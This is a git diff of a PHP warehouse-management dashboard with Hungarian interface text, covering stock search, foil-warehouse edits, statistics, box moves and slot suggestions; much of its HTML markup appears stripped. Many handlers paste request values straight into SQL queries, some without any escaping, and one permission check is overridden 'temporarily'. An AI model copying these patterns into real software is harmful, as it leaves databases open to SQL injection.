($warehouse_structure == null) { + $json = json_encode(["result" => "Nem létező raktár azonosító lett megadva! Próbálja újra."]); + } else if (!UserHasPerm('warehouse_editor')) { + $json = json_encode(["result" => "Önnek nincsen joga raktárat módosítani!"]); + } else { + $sql = mysqli_query($conn,"SELECT count(amount) FROM warehouse WHERE warehouse_id = '$warehouse_id' and amount != 0"); + $isempty = mysqli_fetch_array($sql)[0]; + $canedit = false; + if ($isempty == 0) { + $canedit = true; + } + + $canedit = true; // --> Átmenetileg bekapcsolva + + $json = json_encode([ + "result" => "ok", + "name" => $warehouse_structure["name"], + "location" => $warehouse_structure["location"], + "code" => $warehouse_structure["code"], + "row" => $warehouse_structure["row"], + "columns" => $warehouse_structure["columns"], + "size" => $warehouse_structure["size"], + "capacity" => $warehouse_structure["capacity"], + "status" => $warehouse_structure["status"], + "multiitem_row" => $warehouse_structure["multiitem_row"], + "canedit" => $canedit, + ]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "SaveWarehouse") { + $name = htmlspecialchars($_POST["name"]); + $loc = htmlspecialchars($_POST["location"]); + $code = htmlspecialchars($_POST["code"]); + $row = $_POST["row"]; + $columns = $_POST["columns"]; + $capacity = $_POST["capacity"]; + $status = $_POST["status"]; + $multiitem_row = $_POST["multiitem_row"]; + $size = htmlspecialchars($_POST["size"]); + $warehouse_id = htmlspecialchars($_POST["warehouse_id"]); + + $SizeJSON = json_decode(base64_decode($size), true); + $capacity = $SizeJSON['globalCapacity']; + + $cellcount = intval($row) * intval($columns); + $fullcapacity = 0; + + foreach ($SizeJSON['customCapacity'] as $key => $cap) { + $cellcount--; + $fullcapacity += intval($cap); + } + + $fullcapacity += $cellcount * intval($capacity); + + if (!UserHasPerm('warehouse_editor')) { + $json = json_encode(["result" => "Önnek nincsen joga új raktárat módosítani!"]); + } else if ($name == "" || $loc == "" || $code == "" || $row == "" || $columns == "" || $capacity == "") { + $json = json_encode(["result" => "Az összes paraméter megadása kötelező!"]); + } else { + $sql = mysqli_query($conn,"UPDATE warehouse_structure SET `name`='$name',`location`='$loc',`code`='$code',`row`='$row',`columns`='$columns',`size`='$size',`capacity`='$capacity',`status`='$status',`full_capacity`=$fullcapacity,`multiitem_row`=$multiitem_row WHERE warehouse_id = '$warehouse_id'"); + $json = json_encode(["result" => "ok"]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "search") { + $maxperpage = intval(htmlspecialchars($_POST["perpage"])); + $cpage = intval(htmlspecialchars($_POST["cpage"])); + $orderby = htmlspecialchars($_POST["orderby"]); + + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $location = htmlspecialchars($_POST["location"]); + + $addquery = ""; + $isfirst = true; + + if ($cpage == 0) { + $cpage = 1; + } + setcookie("maxperpage", $maxperpage, time() + (86400 * 90), "/"); + + if ($item_id != "") { + $addquery = $addquery." WHERE item_id LIKE '%".$item_id."%'"; + $isfirst = false; + } + + $WarehouseData = array(); + $finded_place = false; + + if ($location != "") { + $locationquery = 'warehouse_id IN ('; + $query = "SELECT warehouse_id, name, location FROM warehouse_structure WHERE code LIKE '%$location%'"; + if ($result = $conn->query($query)) { + while ($warehouse = $result->fetch_assoc()) { + $finded_place = true; + $locationquery = $locationquery."'".$warehouse["warehouse_id"]."',"; + $WarehouseData[$warehouse["warehouse_id"]] = [ + "name" => $warehouse["name"], + "location" =>$warehouse["location"] + ]; + } + } + $locationquery = substr($locationquery, 0, -1).')'; + + if ($finded_place) { + if ($isfirst) { + $addquery = $addquery." WHERE ".$locationquery; + $isfirst = false; + } else { + $addquery = $addquery." AND ".$locationquery; + } + } + } + if ($location == "" || !$finded_place) { + $query = "SELECT warehouse_id, name, location FROM warehouse_structure"; + if ($result = $conn->query($query)) { + while ($warehouse = $result->fetch_assoc()) { + $WarehouseData[$warehouse["warehouse_id"]] = [ + "name" => $warehouse["name"], + "location" =>$warehouse["location"] + ]; + } + } + } + + if ($isfirst) { + $addquery = $addquery." WHERE amount != 0"; + $isfirst = false; + } else { + $addquery = $addquery." AND amount != 0"; + } + + // Raktár darabszám + $countQuery = "SELECT COUNT(*) as total FROM ( + SELECT item_id, warehouse_id + FROM warehouse".$addquery." + GROUP BY item_id, warehouse_id + ) as grouped_results"; + + $sql = mysqli_query($conn, $countQuery); + $warehouse_count = mysqli_fetch_array($sql)['total']; + + // Fóliás darabszám + $foil_count = 0; + $foil_count_query = "SELECT COUNT(*) as total FROM warehouse_foil WHERE is_active = 1"; + if ($item_id != "") { + $foil_count_query .= " AND item_id LIKE '%".$item_id."%'"; + } + if ($location != "") { + $foil_count_query .= " AND place LIKE '%".$location."%'"; + } + $foil_sql = mysqli_query($conn, $foil_count_query); + $foil_count = mysqli_fetch_array($foil_sql)['total']; + + $total_count = $warehouse_count + $foil_count; + $maxpage = ceil($total_count / $maxperpage); + if (!($cpage >= 1 && $cpage <= $maxpage)) { + $cpage = 1; + } + + $responseArr = array(); + + // Raktár adatok lekérdezése + $offset = ($cpage - 1) * $maxperpage; + $query = "SELECT item_id, warehouse_id, SUM(amount) as total_amount + FROM warehouse".$addquery." + GROUP BY item_id, warehouse_id + LIMIT $offset, $maxperpage"; + + if ($result = $conn->query($query)) { + while ($warehouse_result = $result->fetch_assoc()) { + $responseArr[] = [ + "item_id" => $warehouse_result['item_id'], + "amount" => $warehouse_result['total_amount'], + "location" => $WarehouseData[$warehouse_result['warehouse_id']]['location'], + "name" => $WarehouseData[$warehouse_result['warehouse_id']]['name'], + "warehouse_id" => $warehouse_result['warehouse_id'], + "type" => "warehouse" + ]; + } + } + + // Ha szükséges fóliás adatok lekérdezése + if (count($responseArr) < $maxperpage) { + $remaining = $maxperpage - count($responseArr); + $foil_offset = max(0, $offset - $warehouse_count); + + if ($offset < $warehouse_count + $foil_count) { + $foil_query = "SELECT wid, item_id, place, right_db, left_db FROM warehouse_foil WHERE is_active = 1"; + if ($item_id != "") { + $foil_query .= " AND item_id LIKE '%".$item_id."%'"; + } + if ($location != "") { + $foil_query .= " AND place LIKE '%".$location."%'"; + } + $foil_query .= " LIMIT $foil_offset, $remaining"; + + if ($result = $conn->query($foil_query)) { + while ($foil_result = $result->fetch_assoc()) { + $min_amount = min(intval($foil_result['left_db']), intval($foil_result['right_db'])); + $responseArr[] = [ + "item_id" => $foil_result['item_id'], + "amount" => $min_amount, + "location" => "Fóliás raktár", + "name" => $foil_result['place'], + "warehouse_id" => "foil", + "type" => "foil" + ]; + } + } + } + } + + $reverse = false; + if (!empty($orderby) && $orderby[0] === '!') { + $reverse = true; + $orderby = substr($orderby, 1); + } + + if ($orderby == "amount") { + usort($responseArr, function($a, $b) use ($orderby, $reverse) { + $result = $a[$orderby] <=> $b[$orderby]; + return $reverse ? -$result : $result; + }); + } else { + usort($responseArr, function($a, $b) use ($orderby, $reverse) { + $result = strcmp($a[$orderby], $b[$orderby]); + return $reverse ? -$result : $result; + }); + } + + $responseStr = ""; + for ($i=0; $i < count($responseArr); $i++) { + if ($responseStr != "") { + $responseStr .= "|%|"; + } + $warehouse_id = ($responseArr[$i]['type'] == 'foil') ? 'foil' : $responseArr[$i]['warehouse_id']; + $responseStr .= $responseArr[$i]['item_id'].'/!/'.$responseArr[$i]['amount'].'/!/'.$responseArr[$i]['location'].'/!/'.$responseArr[$i]['name'].'/!/'.$warehouse_id; + } + + echo '{"result": "ok", "data": "'.$responseStr.'", "maxpage": "'.$maxpage.'", "cpage": "'.$cpage.'"}'; + } else if (htmlspecialchars($_POST["func"]) == "SearchFoilItem") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + + $sql = mysqli_query($conn, "SELECT foil_product_place, item_id FROM pr_warehouse_parameters WHERE item_id = '$item_id'"); + $warehouse_foil_param = mysqli_fetch_array($sql); + + if ($warehouse_foil_param == null) { + echo json_encode(["result" => "A termék nem szerepel a katalógusban!"]); + exit(); + } else if (preg_replace('/^\s+|\s+$/', '', $warehouse_foil_param['foil_product_place']) == "") { + echo json_encode(["result" => "A terméknek nincs fóliás raktárhelye"]); + exit(); + } + + $item_id = $warehouse_foil_param['item_id']; + + $places = array_map('trim', explode(',', $warehouse_foil_param['foil_product_place'])); + + $deactivate_sql = mysqli_query($conn, "UPDATE warehouse_foil SET is_active = 0 WHERE item_id = '$item_id' AND place NOT IN ('" . implode("','", $places) . "') AND is_active = 1"); + + $result_arr = []; + + foreach ($places as $place) { + $sql = mysqli_query($conn, "SELECT wid, left_db, right_db FROM warehouse_foil WHERE item_id = '$item_id' AND place = '$place' AND is_active = 1"); + $warehouse_foil = mysqli_fetch_array($sql); + + if ($warehouse_foil == null) { + $sql = mysqli_query($conn, "SELECT wid FROM warehouse_foil WHERE is_active = 0 LIMIT 1"); + $inactive_foil = mysqli_fetch_array($sql); + if ($inactive_foil != null) { + $wid = $inactive_foil['wid']; + $sql = mysqli_query($conn, "UPDATE warehouse_foil SET left_db = 0, right_db = 0, place = '$place', item_id = '$item_id', is_active = 1 WHERE wid = $wid"); + } else { + $sql = mysqli_query($conn, "INSERT INTO warehouse_foil(item_id, place, right_db, left_db, is_active) VALUES ('$item_id', '$place', 0, 0, 1)"); + $wid = mysqli_insert_id($conn); + } + + $left_db = 0; + $right_db = 0; + } else { + $wid = $warehouse_foil['wid']; + $left_db = $warehouse_foil['left_db']; + $right_db = $warehouse_foil['right_db']; + } + + $result_arr[] = [ + 'wid' => $wid, + 'place' => $place, + 'left_db' => $left_db, + 'right_db' => $right_db + ]; + } + + echo json_encode(["result" => "ok", "data" => $result_arr, "warehouse_editor" => UserHasPerm('warehouse_editor')]); +} else if (htmlspecialchars($_POST["func"]) == "EditFoilItem") { + $left_db = intval($_POST["left"]); + $right_db = intval($_POST["right"]); + + $reason = htmlspecialchars($_POST["reason"] ?? ''); + + $result = array(); + $wid_list = []; + + if (isset($_POST["wid"])) { + $wid = htmlspecialchars($_POST["wid"]); + $wid_list = explode('/', $wid); + } else { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $set_item_id = splitSetitem_id($item_id); + if ($set_item_id != null) { + + $item1 = $set_item_id['item1']; + $item2 = $set_item_id['item2']; + + $sql = mysqli_query($conn, "SELECT wid FROM warehouse_foil WHERE item_id = '$item1' LIMIT 1 AND is_active = 1"); + $wid_list[] = mysqli_fetch_array($sql)[0]; + + $sql = mysqli_query($conn, "SELECT wid FROM warehouse_foil WHERE item_id = '$item2' LIMIT 1 AND is_active = 1"); + $wid_list[] = mysqli_fetch_array($sql)[0]; + + } else { + $sql = mysqli_query($conn, "SELECT wid FROM warehouse_foil WHERE item_id = '$item_id' LIMIT 1 AND is_active = 1"); + $wid_list[] = mysqli_fetch_array($sql)[0]; + } + } + + for ($i=0; $i < count($wid_list); $i++) { + $TempWID = $wid_list[$i]; + + $sql = mysqli_query($conn,"SELECT * FROM warehouse_foil WHERE wid = '$TempWID' AND is_active = 1"); + $warehouse_sql_foil = mysqli_fetch_array($sql); + $inWarehouse = max($warehouse_sql_foil['left_db'], $warehouse_sql_foil['right_db']); + if ($warehouse_sql_foil == null) { + echo json_encode(['result'=>'error','reset'=>'true','message'=>'Érvénytelen raktár azonosító'], JSON_UNESCAPED_UNICODE); + exit; + } else { + $sql = mysqli_query($conn,"UPDATE warehouse_foil SET left_db = CASE WHEN left_db + $left_db < 0 THEN 0 ELSE left_db + $left_db END, right_db = CASE WHEN right_db + $right_db < 0 THEN 0 ELSE right_db + $right_db END WHERE wid = '$TempWID'"); + + $loggerclass->writeLogWarehouse(['reason' => 'Fóliás mennyiség szerkesztése', 'reason_code' => 1, + 'item_id' => $warehouse_sql_foil['item_id'], + 'from_place' => $reason, + 'to_place' => $warehouse_sql_foil['place'], + 'amount_left' => $left_db, + 'amount_right' => $right_db + ]); + } + } + + $TempWID = $wid_list[0]; + $sql = mysqli_query($conn, "SELECT item_id FROM warehouse_foil WHERE wid = '$TempWID'"); + $warehouse_foil = mysqli_fetch_array($sql); + + $result['result'] = "ok"; + $result['item_id'] = $warehouse_foil["item_id"]; + + if ($reason != null && $reason != "" ) { + $reasonData = explode("#", $reason); + + if ($reasonData[0] == "Production") { + $validCategories = [ + 'classic' => 'production_classic', + 'injmold' => 'production_injmold', + 'sporty' => 'production_sporty', + 'boxing' => 'production_boxing' + ]; + + if (!array_key_exists($reasonData[1], $validCategories)) { + $result['result'] = "A termék elhelyezve a raktárban, de az indoklás nem került elmentésre!"; + } else { + $table = $validCategories[$reasonData[1]]; + $pr_id = htmlspecialchars($reasonData[2]); + + $sql = mysqli_query($conn, "SELECT db_revenue_bulk_r, db_revenue_bulk_l FROM $table WHERE pr_id = $pr_id"); + $db_revenue = mysqli_fetch_array($sql); + if ($db_revenue != null) { + $new_db_revenue_bulk_r = intval($right_db) + intval($db_revenue['db_revenue_bulk_r']); + $new_db_revenue_bulk_l = intval($left_db) + intval($db_revenue['db_revenue_bulk_l']); + $sql = mysqli_query($conn, "UPDATE $table SET db_revenue_bulk_r = $new_db_revenue_bulk_r, db_revenue_bulk_l = $new_db_revenue_bulk_l WHERE pr_id = $pr_id"); + } + } + } + + } + + echo json_encode($result); + + } else if (htmlspecialchars($_POST["func"]) == "statistics") { + $sql = " + SELECT + CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^[0-9]+$' THEN 'classic' + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^CL[P|M]?[0-9]+$' THEN 'climair' + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^FR[0-9]{4}$' THEN 'injmold' + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^F[0-9]{4}$' THEN 'sporty' + ELSE 'unknown' + END AS category, + SUM(CASE WHEN item_id LIKE '%+%' THEN amount * 2 ELSE amount END) AS amount + FROM warehouse + GROUP BY category + UNION ALL + SELECT 'all' AS category, SUM(CASE WHEN item_id LIKE '%+%' THEN amount * 2 ELSE amount END) AS amount + FROM warehouse; + "; + $db_box = $conn->query($sql); + $box_arr = []; + if ($db_box) { + while ($row = $db_box->fetch_assoc()) { + $box_arr[$row["category"]] = [ + "category" => $row["category"], + "amount" => $row["amount"] + ]; + } + } + + $sql = " + SELECT + CASE + WHEN item_id REGEXP '^[0-9]+$' THEN 'classic' + WHEN item_id REGEXP '^FR[0-9]{4}$' THEN 'injmold' + WHEN item_id REGEXP '^F[0-9]{4}$' THEN 'sporty' + ELSE 'unknown' + END AS category, + SUM(right_db) AS right_db, + SUM(left_db) AS left_db + FROM warehouse_foil WHERE is_active = 1 + GROUP BY category + UNION ALL + SELECT 'all' AS category, SUM(right_db) AS right_db, SUM(left_db) AS left_db + FROM warehouse_foil WHERE is_active = 1; + "; + $db_foil = $conn->query($sql); + $foil_arr = []; + if ($db_foil) { + while ($row = $db_foil->fetch_assoc()) { + $foil_arr[$row["category"]] = [ + "category" => $row["category"], + "right_db" => $row["right_db"], + "left_db" => $row["left_db"] + ]; + } + } + + $all_arr['classic'] = [ + 'amount' => ($box_arr['classic']['amount'] ?? 0) + min($foil_arr['classic']['right_db'] ?? 0, $foil_arr['classic']['left_db'] ?? 0), + 'category' => 'classic' + ]; + $all_arr['climair'] = [ + 'amount' => $box_arr['climair']['amount'] ?? 0, + 'category' => 'climair' + ]; + $all_arr['injmold'] = [ + 'amount' => ($box_arr['injmold']['amount'] ?? 0) + min($foil_arr['injmold']['right_db'] ?? 0, $foil_arr['injmold']['left_db'] ?? 0), + 'category' => 'injmold' + ]; + $all_arr['sporty'] = [ + 'amount' => ($box_arr['sporty']['amount'] ?? 0) + min($foil_arr['sporty']['right_db'] ?? 0, $foil_arr['sporty']['left_db'] ?? 0), + 'category' => 'sporty' + ]; + + + $shortage = []; + $sql = " + SELECT + CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^[0-9]+$' THEN 'classic' + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^CL[P|M]?[0-9]+[A-Z]?$' THEN 'climair' + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^FR[0-9]{4}$' THEN 'injmold' + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^F[0-9]{4}$' THEN 'sporty' + ELSE 'unknown' + END AS category, + SUM(CASE WHEN free_stock = 0 THEN 1 ELSE 0 END) AS nullas_db, + SUM(CASE WHEN free_stock < 0 THEN 1 ELSE 0 END) AS negatv_db + FROM statistics_daily + GROUP BY category + UNION ALL + SELECT 'all' AS category, SUM(CASE WHEN free_stock = 0 THEN 1 ELSE 0 END), SUM(CASE WHEN free_stock < 0 THEN 1 ELSE 0 END) + FROM statistics_daily; + "; + $db_shortage = $conn->query($sql); + if ($db_shortage) { + while ($row = $db_shortage->fetch_assoc()) { + $shortage[$row["category"]] = [ + 'zero' => intval($row['nullas_db']), + 'neg' => intval($row['negatv_db']), + 'category' => $row["category"] + ]; + } + } + + echo json_encode([ + "result" => "ok", + "box" => $box_arr, + "foil" => $foil_arr, + "all" => $all_arr, + "shortage" => $shortage, + ]); + + } else if (htmlspecialchars($_POST["func"]) == "EditFoilWarehouse") { + $wid = htmlspecialchars($_POST["wid"] ?? ''); + $new_place = htmlspecialchars($_POST["new_place"] ?? ''); + + if ($new_place == "") { + echo json_encode(array('result' => 'Kötelező megadni egy raktárhelyet!')); + exit(); + } + + $item_id = ""; + $old_place = ""; + + $right_db = 0; + $left_db = 0; + + $sql = mysqli_query($conn,"SELECT item_id, place, right_db, left_db FROM warehouse_foil WHERE wid = '$wid'"); + $data = mysqli_fetch_array($sql); + if ($data != null) { + $item_id = $data['item_id']; + $old_place = $data['place']; + $right_db = $data['right_db']; + $left_db = $data['left_db']; + } else { + echo json_encode(array('result' => 'Hiibás raktár azonosító!')); + exit(); + } + + $foil_product_place = ""; + + $sql = mysqli_query($conn,"SELECT foil_product_place FROM pr_warehouse_parameters WHERE item_id = '$item_id'"); + $data = mysqli_fetch_array($sql); + if ($data != null) { + $foil_product_place = $data['foil_product_place']; + } else { + echo json_encode(array('result' => 'Hiibás cikkszám bejegyzés!')); + exit(); + } + + $foil_product_place = str_replace($old_place, $new_place, $foil_product_place); + + mysqli_query($conn,"UPDATE pr_warehouse_parameters SET foil_product_place='$foil_product_place' WHERE item_id = '$item_id'"); + mysqli_query($conn,"UPDATE warehouse_foil SET place='$new_place' WHERE wid = '$wid'"); + + $loggerclass->writeLogWarehouse(['reason' => 'Fóliás raktárhely szerkesztése', 'reason_code' => 2, + 'item_id' => $item_id, + 'from_place' => $old_place, + 'to_place' => $new_place, + 'amount_left' => $left_db, + 'amount_right' => $right_db + ]); + + echo json_encode(array('result' => 'ok')); + + } else if (htmlspecialchars($_POST["func"]) == "MoveBox") { + $wh_id = htmlspecialchars($_POST["wh_id"] ?? ''); + $wh_id_new = htmlspecialchars($_POST["wh_id_new"] ?? ''); + + $amount = intval($_POST["amount"] ?? 0); + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + + /* -- Jog Ellenőrzés -- */ + if (!UserHasPerm("box_stock_taking")) { + echo json_encode(array( + 'result' => 'Önnek nincsen joga a művelethez!' + )); + exit(); + } + + /* -- Cikkszám ellenőrzés -- */ + $sql = mysqli_query($conn,"SELECT item_id FROM pr_parameters WHERE item_id = '$item_id'"); + $result = mysqli_fetch_array($sql); + if ($result != null) { + $item_id = $result['item_id']; + } else { + echo json_encode(array( + 'result' => 'Nem létező cikkszámot adott meg!' + )); + exit(); + } + + + /* -- Raktárhely feldolgozás -- */ + + /* Eredeti raktárhely */ + $warehouse_id_old = null; + $position_old = null; + + $position = substr($wh_id, -3); + $wcode = substr($wh_id, 0, strlen($wh_id) - 3); + + $letter = $position[0]; + $numberFromLetter = ord(strtoupper($letter)) - ord('A') + 1; + $number = ltrim(substr($position, 1, 2), '0'); + $position = $numberFromLetter . ':' . $number; + $position_old = $position; + + $sql = mysqli_query($conn,"SELECT warehouse_id FROM warehouse_structure WHERE code = '$wcode'"); + $warehouse_structure = mysqli_fetch_array($sql); + + if ($warehouse_structure != null) { + $warehouse_id = $warehouse_structure['warehouse_id']; + $warehouse_id_old = $warehouse_id; + + $sql = mysqli_query($conn,"SELECT wid, amount FROM warehouse WHERE warehouse_id = '$warehouse_id' and item_id = '$item_id' and position = '$position'"); + $warehouse_box = mysqli_fetch_array($sql); + + if ($warehouse_box == null) { + echo json_encode(array( + 'result' => 'A cikkszám nem található meg ezen a raktárazonosítón!' + )); + exit(); + } else if ($warehouse_box['amount'] < $amount) { + echo json_encode(array( + 'result' => 'Nincs elegendő cikkszám a forrás polcon!' + )); + exit(); + } + } else { + echo json_encode(array( + 'result' => 'Nem létező raktár azonosítót adott meg forrásnak!' + )); + exit(); + } + + /* Új raktárhely */ + $warehouse_id_new = null; + $position_new = null; + + $position = substr($wh_id_new, -3); + $wcode = substr($wh_id_new, 0, strlen($wh_id_new) - 3); + + $letter = $position[0]; + $numberFromLetter = ord(strtoupper($letter)) - ord('A') + 1; + $number = ltrim(substr($position, 1, 2), '0'); + $position_new = $numberFromLetter . ':' . $number; + + $sql = mysqli_query($conn,"SELECT warehouse_id FROM warehouse_structure WHERE code = '$wcode'"); + $warehouse_structure = mysqli_fetch_array($sql); + + if ($warehouse_structure != null) { + $warehouse_id_new = $warehouse_structure['warehouse_id']; + + } else { + echo json_encode(array( + 'result' => 'Nem létező raktár azonosítót adott meg célhelynek!' + )); + exit(); + } + + /* -- Return -- */ + echo json_encode(array( + 'result' => 'ok', + 'position_old' => $position_old, + 'wid_old' => $warehouse_id_old, + 'position_new' => $position_new, + 'wid_new' => $warehouse_id_new, + 'code_old' => $wh_id, + 'item_id' => $item_id, + 'amount' => $amount + )); + + $loggerclass->writeLogWarehouse(['reason' => 'Doboz áthelyezése', 'reason_code' => 1, + 'item_id' => $item_id, + 'from_place' => $position_old, + 'to_place' => $position_new, + 'amount_left' => $amount, + 'amount_right' => $amount + ]); + + } + + + exit(); +} else if (isset($_GET['boxsize']) && $_GET['boxsize'] == '1') { + + $jsonString = file_get_contents('../managers/prdb.json'); + $data = json_decode($jsonString, true); + header('Content-Type: application/json; charset=utf-8'); + echo json_encode($data['BoxSizes']); + + exit(); +} + +$WarehouseLocSelect = ''; +$query = "SELECT DISTINCT location FROM warehouse_structure ORDER BY location ASC"; +if ($result = $conn->query($query)) { + while ($warehouse = $result->fetch_assoc()) { + $WarehouseLocSelect = $WarehouseLocSelect.''; + } +} + +if (!isset($_COOKIE['maxperpage'])) { + setcookie("maxperpage", "25", time() + (86400 * 90), "/"); + $maxperpage = "25"; +} else { + $maxperpage = $_COOKIE['maxperpage']; +} + +setcookie("maxperpage", strval($maxperpage), time() + (86400 * 90), "/"); + +$perpageselect = " + + + + +"; +$perpageselect = str_replace("value='".$maxperpage."'", "value='".$maxperpage."' selected", $perpageselect); + +?> + + + + + + + + Kezelőfelület + + + + +
    +
    +

    Title

    +
    +
    +
    +
    +
    +
    +
    +
    +
    + + + + +

    Raktárak

    + +
    + move-by-trolley'; + } + ?> + + marketing + + label-printer +
    + +
    +
    +

    +
    +
    +

    Raktár kereső

    + +
    +
    +

    Cikkszám:

    + +
    +

    Raktárhely:

    + +
    +

    Oldalanként:

    + +
    +

    :

    + +
    +
    +
    + +
    +
    + + + + + + + + + + + + +
    CikkszámMennyiségRaktárhelySzektorLink
    +
    +
    +
    + +
    +

    <    0 / 0    >

    +
    + +
    +
    +
    +

    Raktártartalom

    +
    +
    + + + + + + + + + + +
    CikkszámMennyiségHelye (Sor:Oszlop)
    +
    +
    +
    + +


    + + + +
    + + + + diff --git a/dashboard/wh_add.php b/dashboard/wh_add.php new file mode 100644 index 0000000..c1eed9d --- /dev/null +++ b/dashboard/wh_add.php @@ -0,0 +1,1008 @@ + "A cikkszámhoz nem lett megadva doboz méret!"]); + exit(); + } + } else { + echo json_encode(["result" => "Nem létező cikkszámot adott meg!"]); + exit(); + } + + /* + -------------------- + Raktár struktúrák + --------------------*/ + $warehouse_config = array(); + $query = "SELECT * FROM warehouse_structure"; + if ($result = $conn->query($query)) { + while ($wh_structure = $result->fetch_assoc()) { + $warehouse_config[$wh_structure["warehouse_id"]] = [ + "capacity" => $wh_structure["capacity"], + "location" => $wh_structure["location"], + "code" => $wh_structure["code"], + "row" => $wh_structure["row"], + "columns" => $wh_structure["columns"], + "status" => $wh_structure["status"], + "size" => $wh_structure["size"], + "name" => $wh_structure["name"], + "multiitem_row" => $wh_structure["multiitem_row"], + "SizeJSON" => json_decode(base64_decode($wh_structure["size"]), true) + ]; + } + } + + /* + -------------------- + Ha van olyan polc (cella) ahol az adott cikkszám megtalálható és nincsen tele + --------------------*/ + $FindedWarehouseElement = array(); + $query = "SELECT * FROM warehouse WHERE item_id = '$item_id' and amount != 0"; + if ($result = $conn->query($query)) { + while ($warehouse = $result->fetch_assoc()) { + + $warehouse_id = $warehouse['warehouse_id']; + $CanSave = true; + + /* Kapacitás számolása */ + $position = explode(":", $warehouse['position']); //($row + 1).':'.($column + 1); + $size_key = (intval($position[1]) - 1).':'.(intval($position[0]) - 1); // $column + $row + + $capacity_left = $warehouse_config[$warehouse_id]["SizeJSON"]['globalCapacity']; + + if (isset($warehouse_config[$warehouse_id]["SizeJSON"]['customCapacity'][$size_key])) { + $capacity_left = $warehouse_config[$warehouse_id]["SizeJSON"]['customCapacity'][$size_key]; + } + + $position = $warehouse['position']; + $sql = mysqli_query($conn,"SELECT SUM(amount) FROM warehouse WHERE position = '$position' and item_id != '$item_id' and amount != 0 and warehouse_id = '$warehouse_id'"); + $otherElement = mysqli_fetch_array($sql); + if ($otherElement != null) { + $capacity_left = $capacity_left - $otherElement[0] - $warehouse['amount']; + } else { + $capacity_left = $capacity_left - $warehouse['amount']; + } + if ($capacity_left <= 0) { + $CanSave = false; + } + + // Ellenőrzés: Doboz mérete + $slot_size = $warehouse_config[$warehouse_id]["SizeJSON"]['customSizes'][$size_key] ?? $warehouse_config[$warehouse_id]["SizeJSON"]['globalSize']; + if (!in_array($slot_size, $item_id_config["size"])) $CanSave = false; + + /* Raktár hely ellenőrzése */ + if ($warehouse_config[$warehouse_id]["location"] != $location && $location != "" && $location != "-1") { + $CanSave = false; + } else if ($warehouse_config[$warehouse_id]["status"] != 1) { + $CanSave = false; + } + + /* Elérhető opció */ + if ($CanSave) { + $FindedWarehouseElement[] = [ + 'wid' => $warehouse['wid'], + 'warehouse_id' => $warehouse_id, + 'position' => $warehouse['position'], + 'amount' => $warehouse['amount'], + 'capacity_left' => $capacity_left + ]; + } + + } + } + + usort($FindedWarehouseElement, function($a, $b) use ($amount_left) { + $a_enough = $a['capacity_left'] >= $amount_left; + $b_enough = $b['capacity_left'] >= $amount_left; + + if ($a_enough && !$b_enough) return -1; + if (!$a_enough && $b_enough) return 1; + + if ($a_enough && $b_enough) { + return $a['capacity_left'] <=> $b['capacity_left']; + } + + return $b['capacity_left'] <=> $a['capacity_left']; + }); + + foreach ($FindedWarehouseElement as $slot) { + if ($amount_left <= 0) break; + + $can_place = min($slot['capacity_left'], $amount_left); + + if ($can_place > 0) { + $WeHaveToPlaceHere[] = [ + 'warehouse_id' => $slot['warehouse_id'], + 'position' => $slot['position'], + 'placed' => $can_place, + 'size' => $item_id_config["size"] + ]; + $amount_left -= $can_place; + } + } + + + /* + -------------------- + Megkeresi a legközelebbi üres polcot, és oda ajánlja + --------------------*/ + $existing_positions = []; + $warehouse_counts = []; + + foreach ($FindedWarehouseElement as $slot) { + $wid = $slot['warehouse_id']; + $existing_positions[$wid][] = $slot['position']; + if (!isset($warehouse_counts[$wid])) $warehouse_counts[$wid] = 0; + $warehouse_counts[$wid]++; + } + + // Súlyozás: leggyakoribb warehouse_id előre + arsort($warehouse_counts); + $sorted_warehouses = array_keys($warehouse_counts); + foreach (array_keys($warehouse_config) as $wid) { + if (!in_array($wid, $sorted_warehouses)) { + $sorted_warehouses[] = $wid; + } + } + + if ($amount_left > 0) { + + foreach ($sorted_warehouses as $wid) { + if (isset($warehouse_config[$wid]["location"]) && $warehouse_config[$wid]["location"] != $location && $location != "" && $location != "-1") continue; + if (isset($warehouse_config[$wid]["status"]) && $warehouse_config[$wid]["status"] != 1) continue; + if (!isset($warehouse_config[$wid])) continue; + if ($amount_left <= 0) break; + + $row = $warehouse_config[$wid]['row']; + $cols = $warehouse_config[$wid]['columns']; + $max_cap = $warehouse_config[$wid]['capacity']; + $GlobalSize = $warehouse_config[$wid]["SizeJSON"]['globalSize']; + + $candidates = []; + + for ($i = 1; $i <= $row; $i++) { + for ($j = 1; $j <= $cols; $j++) { + $pos = "$i:$j"; + + // Ellenőrzés: foglalt pozíció? + $safe_pos = mysqli_real_escape_string($conn, $pos); + $sql = mysqli_query($conn, "SELECT wid FROM warehouse WHERE position = '$safe_pos' AND warehouse_id = '$wid' AND amount != 0"); + if (mysqli_fetch_array($sql) != null) continue; + + // Ellenőrzés: Doboz mérete + $size_key = ($j - 1) . ':' . ($i - 1); + $slot_size = $warehouse_config[$wid]["SizeJSON"]['customSizes'][$size_key] ?? $GlobalSize; + if (!in_array($slot_size, $item_id_config["size"])) continue; + + // Ellenőrzés: kapacitás + $cap_left = $warehouse_config[$wid]["SizeJSON"]['customCapacity'][$size_key] ?? $warehouse_config[$wid]["SizeJSON"]['globalCapacity']; + foreach ($FindedWarehouseElement as $slot) { + if ($slot['warehouse_id'] === $wid && $slot['position'] === $pos) { + $cap_left = (int)$slot['capacity_left']; + break; + } + } + + if ($cap_left <= 0) continue; + + $dist = isset($existing_positions[$wid]) ? min_distance($i, $j, $existing_positions[$wid]) : 0; + + $candidates[] = [ + 'warehouse_id' => $wid, + 'position' => $pos, + 'capacity_left' => $cap_left, + 'distance' => $dist, + 'size' => $slot_size + ]; + } + } + + // Közelebbi pozíciók előnyben, raktárpolc 